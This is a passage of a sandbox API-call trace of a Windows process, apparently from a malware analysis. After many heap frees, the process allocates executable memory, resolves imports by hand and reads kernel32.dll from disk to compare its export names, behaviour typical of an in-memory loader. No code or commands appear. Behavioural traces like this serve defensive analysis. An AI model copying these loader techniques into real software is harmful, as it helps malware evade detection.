lpMem=0x316bc40 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x317ee50 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3192060 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x31a5270 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x31b8480 | out: hHeap=0x5d0000) returned 1 [0286.810] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x31cb690 | out: hHeap=0x5d0000) returned 1 [0286.814] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x31de8a0 | out: hHeap=0x5d0000) returned 1 [0286.816] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x31f1ab0 | out: hHeap=0x5d0000) returned 1 [0286.816] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3204cc0 | out: hHeap=0x5d0000) returned 1 [0286.816] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3217ed0 | out: hHeap=0x5d0000) returned 1 [0286.819] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x322b0e0 | out: hHeap=0x5d0000) returned 1 [0286.819] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x323e2f0 | out: hHeap=0x5d0000) returned 1 [0286.819] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3251500 | out: hHeap=0x5d0000) returned 1 [0286.819] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3264710 | out: hHeap=0x5d0000) returned 1 [0286.821] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3277920 | out: hHeap=0x5d0000) returned 1 [0286.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x328ab30 | out: hHeap=0x5d0000) returned 1 [0286.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x329dd40 | out: hHeap=0x5d0000) returned 1 [0286.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x32b0f50 | out: hHeap=0x5d0000) returned 1 [0286.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x32c4160 | out: hHeap=0x5d0000) returned 1 [0286.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x32d7370 | out: hHeap=0x5d0000) returned 1 [0286.822] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x32ea580 | out: hHeap=0x5d0000) returned 1 [0286.826] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x32fd790 | out: hHeap=0x5d0000) returned 1 [0286.828] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33109a0 | out: hHeap=0x5d0000) returned 1 [0286.828] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3323bb0 | out: hHeap=0x5d0000) returned 1 [0286.831] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3336dc0 | out: hHeap=0x5d0000) returned 1 [0286.831] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3349fd0 | out: hHeap=0x5d0000) returned 1 [0286.831] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x335d1e0 | out: hHeap=0x5d0000) returned 1 [0286.831] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33703f0 | out: hHeap=0x5d0000) returned 1 [0286.833] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3383600 | out: hHeap=0x5d0000) returned 1 [0286.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3396810 | out: hHeap=0x5d0000) returned 1 [0286.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33a9a20 | out: hHeap=0x5d0000) returned 1 [0286.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33bcc30 | out: hHeap=0x5d0000) returned 1 [0286.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33cfe40 | out: hHeap=0x5d0000) returned 1 [0286.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33e3050 | out: hHeap=0x5d0000) returned 1 [0286.918] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x33f6260 | out: hHeap=0x5d0000) returned 1 [0286.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3409470 | out: hHeap=0x5d0000) returned 1 [0286.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x341c680 | out: hHeap=0x5d0000) returned 1 [0286.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x342f890 | out: hHeap=0x5d0000) returned 1 [0286.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3442aa0 | out: hHeap=0x5d0000) returned 1 [0286.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3455cb0 | out: hHeap=0x5d0000) returned 1 [0286.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3468ec0 | out: hHeap=0x5d0000) returned 1 [0286.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x347c0d0 | out: hHeap=0x5d0000) returned 1 [0286.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x348f2e0 | out: hHeap=0x5d0000) returned 1 [0286.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x34a24f0 | out: hHeap=0x5d0000) returned 1 [0286.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x34b5700 | out: hHeap=0x5d0000) returned 1 [0286.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x34c8910 | out: hHeap=0x5d0000) returned 1 [0286.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x34dbb20 | out: hHeap=0x5d0000) returned 1 [0286.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x34eed30 | out: hHeap=0x5d0000) returned 1 [0286.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3501f40 | out: hHeap=0x5d0000) returned 1 [0286.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3515150 | out: hHeap=0x5d0000) returned 1 [0286.935] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3528360 | out: hHeap=0x5d0000) returned 1 [0286.938] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x353b570 | out: hHeap=0x5d0000) returned 1 [0286.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x354e780 | out: hHeap=0x5d0000) returned 1 [0286.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3561990 | out: hHeap=0x5d0000) returned 1 [0286.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3574ba0 | out: hHeap=0x5d0000) returned 1 [0286.942] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3587db0 | out: hHeap=0x5d0000) returned 1 [0286.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x359afc0 | out: hHeap=0x5d0000) returned 1 [0286.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x35ae1d0 | out: hHeap=0x5d0000) returned 1 [0286.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x35c13e0 | out: hHeap=0x5d0000) returned 1 [0286.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x35d45f0 | out: hHeap=0x5d0000) returned 1 [0286.945] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x35e7800 | out: hHeap=0x5d0000) returned 1 [0286.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x35faa10 | out: hHeap=0x5d0000) returned 1 [0286.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x360dc20 | out: hHeap=0x5d0000) returned 1 [0286.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3620e30 | out: hHeap=0x5d0000) returned 1 [0286.950] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3634040 | out: hHeap=0x5d0000) returned 1 [0286.952] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3647250 | out: hHeap=0x5d0000) returned 1 [0287.002] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x365a460 | out: hHeap=0x5d0000) returned 1 [0287.002] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x366d670 | out: hHeap=0x5d0000) returned 1 [0287.003] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3680880 | out: hHeap=0x5d0000) returned 1 [0287.004] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3693a90 | out: hHeap=0x5d0000) returned 1 [0287.004] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x36a6ca0 | out: hHeap=0x5d0000) returned 1 [0287.004] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x36b9eb0 | out: hHeap=0x5d0000) returned 1 [0287.006] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x36cd0c0 | out: hHeap=0x5d0000) returned 1 [0287.007] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x36e02d0 | out: hHeap=0x5d0000) returned 1 [0287.007] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x36f34e0 | out: hHeap=0x5d0000) returned 1 [0287.009] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37066f0 | out: hHeap=0x5d0000) returned 1 [0287.010] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3719900 | out: hHeap=0x5d0000) returned 1 [0287.010] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x372cb10 | out: hHeap=0x5d0000) returned 1 [0287.014] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x373fd20 | out: hHeap=0x5d0000) returned 1 [0287.016] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3752f30 | out: hHeap=0x5d0000) returned 1 [0287.018] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3766140 | out: hHeap=0x5d0000) returned 1 [0287.019] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3779350 | out: hHeap=0x5d0000) returned 1 [0287.019] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x378c560 | out: hHeap=0x5d0000) returned 1 [0287.019] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x379f770 | out: hHeap=0x5d0000) returned 1 [0287.020] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37b2980 | out: hHeap=0x5d0000) returned 1 [0287.021] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37c5b90 | out: hHeap=0x5d0000) returned 1 [0287.021] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37d8da0 | out: hHeap=0x5d0000) returned 1 [0287.023] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37ebfb0 | out: hHeap=0x5d0000) returned 1 [0287.024] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x37ff1c0 | out: hHeap=0x5d0000) returned 1 [0287.024] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38123d0 | out: hHeap=0x5d0000) returned 1 [0287.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38255e0 | out: hHeap=0x5d0000) returned 1 [0287.029] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38387f0 | out: hHeap=0x5d0000) returned 1 [0287.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x384ba00 | out: hHeap=0x5d0000) returned 1 [0287.033] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x385ec10 | out: hHeap=0x5d0000) returned 1 [0287.036] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3871e20 | out: hHeap=0x5d0000) returned 1 [0287.037] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3885030 | out: hHeap=0x5d0000) returned 1 [0287.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3898240 | out: hHeap=0x5d0000) returned 1 [0287.130] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38ab450 | out: hHeap=0x5d0000) returned 1 [0287.130] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38be660 | out: hHeap=0x5d0000) returned 1 [0287.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38d1870 | out: hHeap=0x5d0000) returned 1 [0287.133] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38e4a80 | out: hHeap=0x5d0000) returned 1 [0287.134] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x38f7c90 | out: hHeap=0x5d0000) returned 1 [0287.135] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x390aea0 | out: hHeap=0x5d0000) returned 1 [0287.138] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x391e0b0 | out: hHeap=0x5d0000) returned 1 [0287.139] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39312c0 | out: hHeap=0x5d0000) returned 1 [0287.141] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39444d0 | out: hHeap=0x5d0000) returned 1 [0287.145] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39576e0 | out: hHeap=0x5d0000) returned 1 [0287.149] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x396a8f0 | out: hHeap=0x5d0000) returned 1 [0287.153] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x397db00 | out: hHeap=0x5d0000) returned 1 [0287.153] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3990d10 | out: hHeap=0x5d0000) returned 1 [0287.154] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39a3f20 | out: hHeap=0x5d0000) returned 1 [0287.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39b7130 | out: hHeap=0x5d0000) returned 1 [0287.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39ca340 | out: hHeap=0x5d0000) returned 1 [0287.198] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39dd550 | out: hHeap=0x5d0000) returned 1 [0287.200] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x39f0760 | out: hHeap=0x5d0000) returned 1 [0287.299] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3a03970 | out: hHeap=0x5d0000) returned 1 [0287.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61a690 | out: hHeap=0x5d0000) returned 1 [0287.303] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0287.306] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0287.307] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0287.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0287.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0287.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0287.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0287.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0287.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0287.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0287.309] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0287.309] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0287.309] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0287.310] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0287.310] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0287.310] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0287.310] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0287.310] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0287.310] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0287.310] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0287.310] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fdb40 | out: hHeap=0x5d0000) returned 1 [0287.311] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61d940 | out: hHeap=0x5d0000) returned 1 [0287.315] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e00e0 | out: hHeap=0x5d0000) returned 1 [0287.317] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0287.317] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0287.317] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0287.318] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0287.318] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0287.318] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0287.321] GetProcessHeap () returned 0x5d0000 [0287.321] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x68) returned 0x5d8d40 [0287.321] GetProcessHeap () returned 0x5d0000 [0287.322] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e9160 [0287.322] GetProcessHeap () returned 0x5d0000 [0287.322] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x48) returned 0x5e06d0 [0287.322] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0287.322] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0287.323] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0287.323] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0287.323] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0287.324] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0287.344] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0287.344] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0287.344] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0287.456] GetProcessHeap () returned 0x5d0000 [0287.456] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xac430) returned 0x5fc5f0 [0287.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0287.459] ReadFile (in: hFile=0x134, lpBuffer=0x5fc5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x5fc5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0287.472] CloseHandle (hObject=0x134) returned 1 [0287.472] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0287.481] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0287.482] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0287.482] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0287.482] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0287.482] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0287.482] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0287.482] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0287.482] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0287.482] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0287.482] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0287.482] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0287.482] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0287.482] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0287.483] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0287.483] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0287.483] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0287.483] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0287.483] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0287.486] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0287.486] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0287.486] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0287.486] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0287.486] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0287.486] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0287.487] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0287.487] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0287.487] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0287.487] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0287.487] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0287.487] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0287.487] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0287.487] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0287.487] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0287.487] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0287.487] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0287.488] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0287.488] lstrcmpA 